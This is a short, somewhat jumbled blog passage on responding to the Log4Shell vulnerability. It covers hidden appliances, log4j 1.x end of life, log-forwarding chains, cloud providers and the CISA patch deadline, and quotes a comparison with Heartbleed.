Appliances: Don't forget appliances and other opaque or third-party systems that may be using Java server components, but won't be detected by un-credentialed vulnerability scanning or simple exploitation tests.Īlso, presence of 1.x is not good - 1.x went EOL in August 2015!.Log forwarding: logging infrastructure often has many "northbound" (send my logs to someone) and "southbound" (receiving logs from someone) forwarding/relaying topologies.(For those not familiar, these are terms of art in the NMS (Network Monitoring/Management Systems)/logging space - ref, ref, ref) Chaining them together for exploitation must also be considered. Cloud: Multiple large providers also affected (but this guide focuses mostly on customer-managed side).Deadlines: CISA orders federal agencies to patch Log4Shell by December 24th.Aside from having RCE as the impact, the number of interdependencies around log4j (and particularly the age of them) is orders of magnitude higher" - "What people seem to miss: "hearing folks compare #log4shell is "as bad as heartbleed" - imo it's much, much worse.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |